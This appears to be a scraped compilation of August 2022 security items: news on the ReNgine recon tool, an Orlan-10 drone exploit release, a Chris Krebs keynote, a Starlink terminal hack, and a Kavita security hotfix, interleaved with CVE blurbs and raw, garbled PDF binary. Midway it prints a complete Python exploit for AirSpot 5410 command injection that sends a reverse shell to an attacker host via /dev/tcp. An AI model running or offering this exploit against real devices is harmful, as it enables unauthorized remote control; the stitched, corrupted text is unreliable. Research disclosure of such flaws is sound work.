Open source recon tool automates some of the more time-consuming pen testing tasks

James Walker 11 August 2022 at 15:35 UTC

Open source recon tool automates some of the more time-consuming pen testing tasks

Black Hat USA attendees were given a firsthand look at the new and improved ReNgine, which includes several new features for penetration testers and red teamers.

ReNgine is a highly customizable open source reconnaissance framework that works with other utilities to scan domains, list endpoints, and search directories.

Security professionals can use the tool to create a pipeline that pulls together more complex queries from scan engines and present the results in a single window.

**BACKGROUND** ReNgine: Open source recon tool automates intel-gathering process for pen testers

With 4,500 stars on GitHub, ReNgine has continued to grow in popularity over recent months – thanks in no small part to the steady addition of new features to assist pen testers with their daily tasks.

The tool’s developer is Yogesh Ojha, a security pro working on web and mobile applications. His goal is to automate some of the more time-consuming research operations, as well as bringing open source hacking tools together.

“There are several open source recon tools in the market,” Ojha told _The Daily Swig_. “What sets ReNgine apart from the other tools is the easy-to-use web interface, ability to customize the scan engines according to the targets, the UI/UX, and easy integration on VPS with minimal setup.”

**New features**

Launched in time for Black Hat USA, and showcased during the Arsenal sessions on Wednesday (August 10), ReNgine version 1.3.0 includes several new features.

First up is a unique subscan feature that allows users to scan any target subdomains further.

“Once subdomain scanning is done, you can choose one or multiple subdomains and send for further port scans, vulnerability scans, or any scans available,” Ojha explained.

“The added benefit of the subscan feature is that, for larger targets like google.com you need not wait for the entire scan to complete. One can simply perform a subdomain scan and perform further sub scans on those subdomains.”

Read about more of the latest hacking tools

ReNgine 1.3.0 also comes bundled with a highly customizable PDF report feature, which allows users to choose the type, look, and feel of the report.

Meanwhile, a new toolbox feature for ReNgine allows pen testers to integrate tools like WHOIS lookup and WAF Detector without the need to add a URL/domain as targets. More toolboxes are on the way.

Among the various UI/UX improvements in ReNgine 1.1, column filtering “was one of the most asked for features”, Ojha said.

“Column filtering allows users to focus on what’s important in the subdomains, endpoints, and vulnerability result table section. This allows users to hide and unhide certain columns.”

Ojha added: “In a nutshell, the newer upgrade of ReNgine makes it more than just a recon tool. The latest update aims to fix the gap in the traditional recon tools and probably a much better alternative for some of the commercial recon and vulnerability assessment tools.

**YOU MIGHT ALSO LIKE** Latest web hacking tools – Q3 2022

ReNgine upgrade: New subscan feature, PDF reports, expanded toolbox showcased at Black Hat USA

Improper Input Validation vulnerability in the project upload mechanism in B&R Automation Studio version >=4.0 may allow an unauthenticated network attacker to execute code.

%PDF-1.7 %���� 1 0 obj <>/Metadata 165 0 R/ViewerPreferences 166 0 R>> endobj 2 0 obj <> endobj 3 0 obj <>/ExtGState<>/XObject<>/ProcSet\[/PDF/Text/ImageB/ImageC/ImageI\] >>/Annots\[ 9 0 R\] /MediaBox\[ 0 0 595.32 841.92\] /Contents 4 0 R/Group<>/Tabs/S/StructParents 0>> endobj 4 0 obj <> stream x��\[\[o��~7��0@��\*��w����d��pm�}�䁒���"������˞9��a,��m�8o�:���f��(��dR�7oF��2�,ҩ�<��׿�����:�/��\\���v;.�ԏi2M��o���+����-m�'�B%l�ǾtyJƎ(���Ud�g�w�g��J�2����o��~ ��aHGܭ�nC1���Ŝ~Eկ��>\[b�����x�?��ć��ĨŌ˼,�U�%��zK�K�PFd�\_�}����4��\*���/�ضJ1����%.C��n0���}O�L)xA\`�Lt-̵m�-nx�d7��{Ɏ-c�,����'�-QJ��$ޡ��p�a��S��Ww

CVE-2021-22289

The Gumstix Overo SBC on the VSKS board through 2022-08-09, as used on the Orlan-10 and other platforms, allows unrestricted remapping of the NOR flash memory containing the bitstream for the FPGA.

**Background**

Subreption’s research and development team, for the past few months, has been dedicating manpower and resources to investigate and analyze military and paramilitary drone platforms operating in Asia and Europe. Our background is primarily vulnerability research and reverse engineering, enabling us to understand these platforms for both offensive and defensive purposes, including but not limited to detection, forensics data acquisition and active countermeasures.

**Demystifying the Orlan: a technical report**

As part of the announcement, we are releasing our first public report from the program, related to the Orlan (primarily Orlan-10) platforms in use by the armed forces of the Russian Federation. The Orlan-10 has been a center piece in the Russo-Ukrainian war of 2022, with sensational coverage from the press. Very little factual or in-depth information has been published, and most of the journalism involved has been heavily connected to counter-drone (CUAS) commercial vendors making claims without third-party verification.

We are taking the opportunity to release the first documented exploit against a military drone platform (in this case, one targeting the FPGA used in the Orlan-10 communications system), while providing in-depth analysis of the hardware and software internals, detailing the reverse engineering efforts involved. Hopefully, this invites and motivates others (including academia and industry peers) to publish factual, technically verifiable research instead of “marketing in disguise”. While the topic is sensitive, we have carefully assessed the information published, withholding details that might not be ready for public disclosure yet.

For the better and the worse, information related to the Orlan platform has been circulating in a mostly uncontrolled and unsupervised fashion with third-parties for the last few months.

In many cases, this was directly connected with for-profit organizations attempting to develop products for the Ukrainian market, and more often than not, security practices left much to be desired (admittedly, many of the organizations involved with CUAS products are not qualified as software security vendors, and typically radiofrequency engineers and hardware development vendors do not have a spotless security posture, most of them being wildly unaware of the state of the art in offensive security).

Contrary to propaganda, the Orlan platform, contains sophisticated original research and development, especially in its communications system. We are dedicated to providing truthful, unbiased information to our customers and the general public, as part of our principles and values, beyond any commercial, personal or political agenda.

**The report can be downloaded here:**

*   https://subreption.com/downloads/reports/demystifying-the-orlan-10\_opt.pdf (optimized PDF)
*   https://github.com/subreption/birdwatch-report-1-repo (including source code and additional files, mirror/fork freely)

**What does the exploit do?**

*   The exploit abuses a vulnerability in the FPGA application and Linux kernel driver, to remap access to the NOR flash memory containing the actual “application” or bitstream the FPGA boots from.
*   This allows rendering the drone inoperable and/or trojanizing the FPGA software.
*   Remote (over the network) vectors exist to abuse the vulnerability, allowing a full remote exploit chain to exist when paired with a traffic injection attack.

**Take-aways**

*   The technical report is the **first of its kind**, with no technical resources of reverse engineering or in-depth analysis of the Orlan-10. Every news piece to date merely focused on unverified claims or marketing attempts for products sold by CUAS vendors.
*   This is the **first publicly documented military drone vulnerability published or disclosed openly**.
*   The code to the FPGA NOR remapping exploit has been publicly released at https://github.com/subreption/birdwatch-report-1-repo/tree/master/src
*   The report and tools developed are the result of the BIRDWATCH program, a months-long initiative to collaborate with groups interested in independent, unbiased investigation of (mostly military) drone security.

**The BIRDWATCH program**

Subreption recently opened up the BIRDWATCH program to be more accessible and transparent, focusing on a non-commercial approach. Our intentions with the program are fairly straightforward: to provide reverse engineering and accurate analysis of drone platforms used for defensive and offensive purposes. We have successfully collaborated with multiple groups internationally, including groups based out of Ukraine.

The nature and motivations of the program are not political. We strive to remain impartial, focused on the technical details and unbiased analysis. We will consider cooperation with any organizations and individuals, with no discrimination, so as long as it is permitted by law, including any applicable restrictions due to sanctions.

**How to participate**

At the moment, there are two distinct venues for collaboration, for commercial and non-commercial engagements.

*   **If you are a non-government not-for-profit organization or institution**, not presently taking bribes or commissions in any shape or form from commercial vendors, we can offer pro bono services including research and forensics data analysis.
    *   This service requires transparency and accountability, as we will independently take the appropriate measures to **identify and validate partners and their affiliations**.
    *   We do not offer pro bono services to individuals, business entities or governments, with no exceptions.
    *   Any form of profit (direct or indirect) is an instant disqualifier from our “pro bono” work. This includes, but is not limited to, employment or income sources directly related or benefiting from activities related to cooperation with the program.
    *   Organizations engaging in procurement or contracting of foreign vendors and their products are typically excluded as well.
*   **If you are a for profit organization** (including but not limited to charities receiving financial aid and at the same time purchasing or engaging in the trade of high value products and services), we can offer competitive pricing on our consulting and research and development services.

While we might occasionally make exceptions, we do not engage with pseudonymous individuals or organizations without adequate accountability. We are also not interested in the illegal or illegitimate trade of hardware or captured systems. In order to protect both the work and the interests of all parties involved, Subreption will require both a Mutual Non-disclosure Agreement and a Non-compete Agreement signed by all the recipients of the information and hardware exchanged.

**Sending applications**

If you meet the criteria, feel absolutely **welcome** to contact us at including as much detail as possible in your application. **We will consider all applicants carefully on a case-by-case basis.**

**Conflicts of interest**

Subreption is not currently involved in the sale or procurement of counter drone-related products for Ukraine. All research related to military drone platforms until August 2022 has been provided free of charge, as part of the BIRDWATCH program.

Our staff has no assets or financial instruments associated in any way to any consumer or industrial drone (or counter-drone) vendor.

Subreption is providing pro bono consulting and research to multiple institutions in Europe and Asia, as well as volunteer organizations, in the context of information security (defensive and offensive).

**References**

*   US Army OE Data Integration Network (ODIN) resources on Orlan systems
*   Orlan-10 (Wikipedia)
*   Russia’s Deadly Artillery Drones Have A Strange Secret (Forbes)

**Updates**

Any updates and amendments to this press release will be listed in this section.

Press and media can reach us at regarding this announcement or any other inquiries.

Feel welcome to use PGP if you have sensitive information or special confidentiality needs.

    -----BEGIN PGP PUBLIC KEY BLOCK-----
    
    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
    =D+RF
    -----END PGP PUBLIC KEY BLOCK-----

CVE-2022-38161: BIRDWATCH program: Ghost in the Orlan: demystifying a military drone platform

Attack on Taiwan seemingly a case of ‘when’ not ‘if’ Chris Krebs, the former director of the US Cybersecurity and Infrastructure Security Agency (CISA), says the infosec industry is “bearish in the sh

Attack on Taiwan seemingly a case of ‘when’ not ‘if’

Chris Krebs, the former director of the US Cybersecurity and Infrastructure Security Agency (CISA), says the infosec industry is “bearish in the short term, bullish in the long term” on the prospects for US national cyber-resilience.

The ex-director, now a founding partner of Krebs Stamos Group, told an audience at Black Hat USA that a likely Chinese attack on Taiwan meant organizations had to act now on making their digital infrastructure and supply chain resilient during the opening day of the annual conference, this year held both physically and virtually.

Krebs addressed attendees on the conference’s 25th edition as the opening keynote speaker.

**Taiwan in dire straits**

Earlier, Black Hat founder Jeff Moss introduced the talk by reflecting on how Russia’s invasion of Ukraine had awakened the infosec community to its power to help the government defend human rights and tackle “mis, dis, and mal information”.

Krebs, who served under President Donald Trump, said organizations, too, had an obligation to have principles and red lines in place before further geopolitical conflagrations erupted – for both ethical and self-interested motives.

Catch up with the latest cyber warfare news

US officials had indeed told him that they were "pretty confident" that the Taiwan tensions are "going to come to a head" at some point, as Krebs warned that organizations should “manage risk yesterday”, game out how it might affect their supply chain and IT operations, and physically segment their networks in Taiwan starting “now”.

**Workforce shortage**

Krebs noted that he found it “confounding” that the cybersecurity workforce continues to face workforce shortages. After all, the cybersecurity career was fun, lucrative, durable, fascinating, and – given that national security was at stake – meaningful, he said.

One key to addressing growing cyber-threats is providing more opportunities for young people to experience coding and to instil “critical thinking skills”, suggested Krebs.

Chris Krebs at Black Hat USA: US Department of Defense has “incredible purchasing power – they must use it”

On a more positive note, he took hope from an increasingly tech-native workforce.

Another reason for cheer was found in the boardroom, with “a CEO that sees cyber risk as business risk is rare, but that is changing post-Colonial \[Pipeline ransomware attack\].”

**Unthinkable complexity**

The workforce gap is fuelled by, as Krebs described (PDF) it to a US congressional committee, society’s “pathological need to connect everything to the internet”, resulting in a ballooning attack surface.

The targets are increasingly complex too, to the point where even experts struggle to understand what Neuromancer author William Gibson prophetically called “the unthinkable complexity” of cyberspace.

Citizens, infosec professionals, and organizations alike must reckon with the fact that every country in the world – not just China, Russia, Iran, and North Korea – is seeing the internet as the “fifth domain”, through which they can surveil, destroy, and disrupt, observed Krebs.

Meanwhile, ransomware groups are capable of exploits that were sole preserve of nation states only few years ago, and that following NotPetya, the 2015 Ukraine power grid attack, and the SolarWInds hack, more novel, innovative attacks would inevitably arise, he warned. “We’ve fetishized the APT threat while cybercriminals have eaten our lunch,” said Krebs.

Krebs set out his prescriptions for how the cybersecurity industry and government should get ahead of the coming threats. Government, for instance, should leverage its role as consumer, enforcer, defender, and enabler. As a consumer, to take one example, he said: “The US Department of Defence the largest customer of big tech firms” with “incredible purchasing power – they have to use it.”

As for his former employer, CISA, he insisted that it is, and must continue to be, apolitical.

RECOMMENDED The best Black Hat and DEF CON talks of all time

Black Hat USA: Ex-CISA director Chris Krebs urges orgs to bolster infrastructure amid Taiwan tensions

Server-Side Request Forgery (SSRF) in GitHub repository kareadita/kavita prior to 0.5.4.1.

Permalink

Browse files

v0.5.4.1 - Security Hotfix (#1414)

\* Updated our security file with our Huntr.

\* Fixed a security vulnerability where through the API, an unauthorized user could delete/modify reading lists that did not belong to them.

Fixed a bug where when creating a reading list with the name of another users, the API would throw an exception (but reading list would still get created)

\* Fixed a security vulnerability where through the API, an unauthorized user could delete/modify reading lists that did not belong to them.

Fixed a bug where when creating a reading list with the name of another users, the API would throw an exception (but reading list would still get created)

\* Ensure all reading list apis are authorized

\* Ensured all APIs require authentication, except those that explicitly don't. All APIs are default requiring Authentication.

Fixed a security vulnerability which would allow a user to take over an admin account.

\* Fixed a bug where cover-upload would accept filenames that were not expected.

\* Explicitly check that a user has access to the pdf file before we serve it back.

\* Enabled lock out when invalid user auth occurs. After 5 invalid auths, the user account will be locked out for 10 mins.

\* Version bump for hotfix release

*   Loading branch information

CVE-2022-2756: v0.5.4.1 - Security Hotfix (#1414) · Kareadita/Kavita@9c31f7e

AirSpot 5410 versions 0.3.4.1-4 and below suffer from an unauthenticated remote command injection vulnerability.

    # -*- coding: utf-8 -*-# Exploit Title: AirSpot unauthenticated remote command injection# Date: 7/26/2022# Exploit Author: Samy Younsi (NSLABS) (https://samy.link)# Vendor Homepage: https://www.airspan.com/# Software Link: https://wdi.rfwel.com/cdn/techdocs/AirSpot5410.pdf# Version: 0.3.4.1-4 and under.# Tested on: Airspan AirSpot 5410 version 0.3.4.1-4 (Ubuntu)# CVE : CVE-2022-36267from __future__ import print_function, unicode_literalsimport argparseimport requestsimport urllib3urllib3.disable_warnings()def banner():  airspanLogo = """       ,-.     / \  `.  __..-,O    :   \ --''_..-'.'    |    . .-' `. '.    :     .     .`.'     \     `.  /  ..      \      `.   ' .       `,       `.   \      ,|,`.        `-.\     '.||  ``-...__..-`      |  | Airspan       |__| AirSpot 5410      /||\ PWNED x_x     //||\\    // || \\ __//__||__\\__'--------------'Necrum Security Labs                        \033[1;92mSamy Younsi (Necrum Security Labs)\033[1;m         \033[1;91mAirSpot 5410 CMD INJECTION\033[1;m                                                                 FOR EDUCATIONAL PURPOSE ONLY.     """  return print('\033[1;94m{}\033[1;m'.format(airspanLogo))def pingWebInterface(RHOST, RPORT):  url = 'https://{}:{}'.format(RHOST, RPORT)  try:    response = requests.get(url, allow_redirects=False, verify=False, timeout=30)    if response.status_code != 200:      print('[!] \033[1;91mError: AirSpot 5410 device web interface is not reachable. Make sure the specified IP is correct.\033[1;m')      exit()    print('[INFO] Airspan device web interface seems reachable!')  except:    print('[!] \033[1;91mError: AirSpot 5410 device web interface is not reachable. Make sure the specified IP is correct.\033[1;m')    exit()def execReverseShell(RHOST, RPORT, LHOST, LPORT):  payload = '`sh%20-i%20%3E%26%20%2Fdev%2Ftcp%2F{}%2F{}%200%3E%261`'.format(LHOST, LPORT)  data = 'Command=pingDiagnostic&targetIP=1.1.1.1{}&packetSize=55&timeOut=10&count=1'.format(payload)  try:    print('[INFO] Executing reverse shell...')    response = requests.post('https://{}:{}/cgi-bin/diagnostics.cgi'.format(RHOST, RPORT), data=data, verify=False)    print("Reverse shell successfully executed. {}:{}".format(LHOST, LPORT))    return  except Exception as e:      print("Reverse shell failed. Make sure the AirSpot 5410 device can reach the host {}:{}").format(LHOST, LPORT)      return Falsedef main():  banner()  args = parser.parse_args()  pingWebInterface(args.RHOST, args.RPORT)  execReverseShell(args.RHOST, args.RPORT, args.LHOST, args.LPORT)if __name__ == "__main__":  parser = argparse.ArgumentParser(description='Script PoC that exploit an nauthenticated remote command injection on Airspan AirSpot devices.', add_help=False)  parser.add_argument('--RHOST', help="Refers to the IP of the target machine. (Airspan AirSpot device)", type=str, required=True)  parser.add_argument('--RPORT', help="Refers to the open port of the target machine. (443 by default)", type=int, required=True)  parser.add_argument('--LHOST', help="Refers to the IP of your machine.", type=str, required=True)  parser.add_argument('--LPORT', help="Refers to the open port of your machine.", type=int, required=True)  main()

AirSpot 5410 0.3.4.1-4 Remote Command Injection

It cost a researcher only $25 worth of parts to create a tool that allows custom code to run on the satellite dishes.

Since 2018, Elon Musk’s Starlink has launched more than 3,000 small satellites into orbit. This satellite network beams internet connections to hard-to-reach locations on Earth and has been a vital source of connectivity during Russia’s war in Ukraine. Thousands more satellites are planned for launch as the industry booms. Now, like any emerging technology, those satellite components are being hacked.

Today, Lennert Wouters, a security researcher at the Belgian university KU Leuven, will reveal one of the first security breakdowns of Starlink’s user terminals, the satellite dishes (dubbed Dishy McFlatface) that are positioned on people’s homes and buildings. At the Black Hat security conference in Las Vegas, Wouters will detail how a series of hardware vulnerabilities allow attackers to access the Starlink system and run custom code on the devices.

To access the satellite dish’s software, Wouters physically stripped down a dish he purchased and created a custom hacking tool that can be attached to the Starlink dish. The hacking tool, a custom circuit board known as a modchip, uses off-the-shelf parts that cost around $25. Once attached to the Starlink dish, the homemade printed circuit board (PCB) is able to launch a fault injection attack—temporarily shorting the system—to help bypass Starlink’s security protections. This “glitch” allows Wouters to get into previously locked parts of the Starlink system.

Wouters is now making his hacking tool open source on GitHub, including some of the details needed to launch the attack. “As an attacker, let’s say you wanted to attack the satellite itself,” Wouters explains, “You could try to build your own system that allows you to talk to the satellite, but that’s quite difficult. So if you want to attack the satellites, you would like to go through the user terminal as that likely makes your life easier.”

The researcher notified Starlink of the flaws last year and the company paid Wouters through its bug bounty scheme for identifying the vulnerabilities. Wouters says that while SpaceX has issued an update to make the attack harder (he changed the modchip in response), the underlying issue can’t be fixed unless the company creates a new version of the main chip. All existing user terminals are vulnerable, Wouters says.

Starlink says it plans to release a “public update” following Wouters’ presentation at Black Hat this afternoon, but declined to share any details about that update with WIRED prior to publication.

Starlink’s internet system is made up of three major parts. First, there are the satellites that move in low Earth orbit, around 340 miles above the surface, and beam down connections to the surface. The satellites communicate with two systems on Earth: gateways that send internet connections up to the satellites, and the Dishy McFlatface dishes people can buy. Wouters’ research focuses on these user terminals, which originally were round, but newer models are rectangular.

There have been multiple teardowns of Starlink’s user terminals since the company started selling them. Engineers on YouTube have opened up their terminals, exposing their components and how they work. Others discuss the technical specs on Reddit. However, Wouters, who previously created hardware that can unlock a Tesla in 90 seconds, looked at the security of the terminal and its chips. “The user terminal was definitely designed by capable people,” Wouters says.

His attacks against the user terminal involved multiple stages and technical measures before he finally created the now open source circuit board that can be used to glitch the dish. Broadly, the attack using the custom circuit board works by bypassing signature verification security checks, which look to prove that the system is launching correctly and hasn’t been tampered with. “We’re using this to accurately time when to inject the glitch,” Wouters says.

Starting in May 2021, Wouters began testing the Starlink system, getting 268-Mbps download speeds and 49-Mbps upload speeds on his university building’s roof. Then it was time to open the device up. Using a combination of a “heat gun, prying tools, isopropyl alcohol, and a lot of patience,” he was able to remove the large metal cover from the dish and access its internal components.

Photograph: Lennert Wouters

Under the 59-cm diameter hood is a large PCB that houses a system-on-chip, including a custom quad-core ARM Cortex-A53 processor, the architecture of which isn’t publicly documented, making it harder to hack. Among other items on the board are radio frequency equipment, power over ethernet systems, and a GPS receiver. Opening up the dish allowed Wouters to understand how it boots up and download its firmware.

To design the modchip, Wouters scanned the Starlink dish and created the design to fit over the existing Starlink board. The modchip requires soldering to the existing Starlink PCB and connecting it using a few wires. The modchip itself is made up of a Raspberry Pi microcontroller, flash storage, electronic switches, and a voltage regulator. When creating the user terminal’s board, Starlink engineers printed “Made on Earth by humans” across it. Wouters’ modchip reads: “Glitched on Earth by humans.”

To get access to the dish’s software, Wouters used his custom system to bypass security protections by using the voltage fault injection attack. When the Starlink dish is turning on, it uses a series of different bootloader stages. Wouters’ attack runs the glitch against the first bootloader, known as the ROM bootloader, which is burned onto the system-on-chip and can’t be updated. The attack then deploys patched firmware on later bootloaders, which allows him to take control of the dish.

“From a high-level view, there are two obvious things that you could try to attack: the signature verification or the hash verification,” Wouters says. The glitch works against the signature verification process. “Normally you want to avoid shorts,” he says. “In this case we do it on purpose.”

Initially, Wouters attempted to glitch the chip at the end of its boot cycle—when the Linux operating system has fully loaded—but ultimately found it easier to cause the glitch at the start of the boot. This way was more reliable, Wouters says. To get the glitch to work, he says, he had to stop decoupling capacitors, which are used to smooth out the power supply, from operating. Essentially, the attack disables the decoupling capacitors, runs the glitch to bypass the security protections, and then enables the decoupling capacitors.

This process allows the researcher to run a patched version of Starlink’s firmware during the boot cycle and ultimately allows access to its underlying systems. In response to the research, Wouters says, Starlink offered him researcher-level access to the device’s software, although he says he declined as he had gone too deep with the work and wanted to build the modchip. (During testing, he hung the modified dish out of this research lab’s window and used a plastic bag as a makeshift waterproofing system.)

Starlink also issued a firmware update, Wouters says, that makes the attack harder, but not impossible, to execute. Anyone wanting to break into the dish in this way would have to put a lot of time and effort into doing so. While the attack isn’t as devastating as being able to take down satellite systems or connectivity, Wouters says it can be used to learn more about how the Starlink network operates.

“What I am working on now is communicating with the backend servers,” Wouters explains. Despite making the details of the modchip available for download on Github, Wouters does not have any plans to sell finished modchips, nor is he providing people with patched user terminal firmware or the exact details of the glitch he used.

As an increasing amount of satellites are launched—Amazon, OneWeb, Boeing, Telesat, and SpaceX are creating their own constellations—their security will come under greater scrutiny. In addition to providing homes with internet connections, the systems can also help to get ships online, and play a role in critical infrastructure. Malicious hackers have already shown that satellite internet systems are a target. As Russian troops invaded Ukraine, alleged Russian military hackers targeted the Via-Sat satellite system, deploying wiper malware that bricked people’s routers and knocked them offline. Around 30,000 internet connections in Europe were disrupted, including more than 5,000 wind turbines.

“I think it’s important to assess how secure these systems are because they are critical infrastructure,” Wouters says. “I don’t think it's very far-fetched that certain people would try to do this type of attack because it is quite easy to get access to a dish like this.”

_Update 5 pm ET August 10, 2022:_ After Wouters’ conference talk, Starlink published a six-page PDF explaining how it secures its systems. “We find the attack to be technically impressive, and is the first attack of its kind that we are aware of in our system,” the paper says. “We expect attackers with invasive physical access to be able to take malicious actions on behalf of a single Starlink kit using its identity, so we rely on the design principle of ‘least privilege’ to constrain the effects in the broader system.”

Starlink reiterates that the attack needs physical access to a user terminal and emphasizes its secure boot system, which was compromised by the glitching process, is only impacted on that one device. Wider parts of the overall Starlink system are not impacted. “Normal Starlink users do not need to be worried about this attack affecting them, or take any action in response,” Starlink says.

The Hacking of Starlink Terminals Has Begun

A vulnerability has been identified in Simcenter STAR-CCM+ (All versions only if the Power-on-Demand public license server is used). Affected applications expose user, host and display name of users, when the public license server is used. This could allow an attacker to retrieve this information.

%PDF-1.5 %���� 47 0 obj << /Length 2695 /Filter /FlateDecode >> stream xڵZKs�8��W�6T��� r��J��8�ʲ���9p$�f�"�$eo��v�,���f�Hh���n� ޟ�6?{�N���(����8�mQL�e�%���UZԣ1�qx�.6�h�T�5���d���%, ���F|��9~\]��͢9��F�{>�s��l:?���h�^PD,Vg\_�����P"L<۝�@\*A��7g�>�^���C��\*"4�C4cI��\[�V?�L#��U�2�E�W��d���T�}-S�0~��,&L���;$4'ZECG�01$ӂP�Ў��=Z��VI���k)�4�Su���X���:�QR0ب��@ZZu����J����J\_� ��'� $�"�\_D�hH!1\])�F 7y�V�\_Y�A�J���4cH! �G �8����hO��Ǎ���<�փ��Y-�14" �0h$f�؋�l�H�&�zӓM%�K5h~\\�cR��Cܻ��#C��l|~~�{�~Z�K�4sE����Ʀ�<\[�@�I�"iҷ��c�CN9�xL R����;�1�w�v�t��f���7U�r�F1 Ӫ���d1���{���ܸCO�0��\[R��n,� Б mII��Yɞ|B���\[DR�������F������'pA�fE\`Pq0\_u|h�Y�ve�o k�e�$���𖠱���� b=�Q�j�;���|n��O6K� �La��SOjSgŃ\[l����#���x2��e1�HWI��&ګ��kk'�z�\\�B��ݛ�NxqdQm�'� ��Il����Y�h��&\_� �EZ{��x���&\]�����e���7��ǿ���Γ�)�U�"'"�Tw��W��鶀E���\\W�:���\*�66F���tQ����~��z�.������~!�U��=��{d��^h���F�f߹��Z j�1Ɖ�T�2E�\*���+�ỵDӪ�{�%Y�8S���7��K �4������S��ݻ��|zу��!\`�#nxȣ>8%8a�(�#H� 1�İ�w�����>\_ܞ�oz$0���D0PG�A�CifzP A ��S��9�'1����H(M�C�#1�t���o痟?��,>��a�jc�Nk����o�r(�U��!\[.������?T��ʬ��yfv��uαa-�\* �wZ�V�;���)��1����t,�t�vu�{�|����0?c��<����)� ���>���\*:U!�JH����ev�uR�������ݎ���\\�D� q�@ -�N�v�ί$\_�W���?�L\[,�:kJ !���/�\`l��l\[�1�h�C)W'y��V9�Aj�V�"�\`��ٽ\[q� �G� d�=��n��E���e�H�bDLv1���f����A�7X�u�)<��\[�T�OD1����,���;be}������\`�T����\\��MX�Z�>�Ϳ�&��bfH4ߒ ֲ���,h(M��Y�Ԧ���������O+�U"��Iq| ߠ�Ua�U�#�����wv�\[�3�����O}8(���L�A )��!q��3tW�^�b��I��^�1����GRBuپ��\_���(��MO���Rt� D#�^5A\*|L�C���\`�W�U�%��%�\]��=�~��N��%P�7>U�� FGҸ�Ŧn�$n�j�f<�^�\\�˾�4J�\*P�T|��ǡo��oo; ��� ��9n�ݯ�vAH�qp \`ZĀ�nS\]�j����ТC���Uejn��-�D�y�l {r�!������駛�?//�����"d�o�\]r�\`���S��-"�go\*�b�M�p,�U�/�Gܠ���Y��DG~����ns�m���~��\]�n���������-nIW�ӗ���7��>u,����:m/��+ ��z��'i��+l̊E�C�!����R�Z=Soֻ�P�VFE?\`��ޡ8������!�8\]�#^E������}+ F�W�2\[��@��!��h�I�D-��8� ��.Y�;bi���a����N�x��t;�����y��Æ�i;���$5ۃ\]� 4xl������PQ���Z����t6��7π�!u��� �2�1�+ǃ�#-(�o�緳��}��(�����g�P3�>P3��g���WWS(�Ce�\*��PB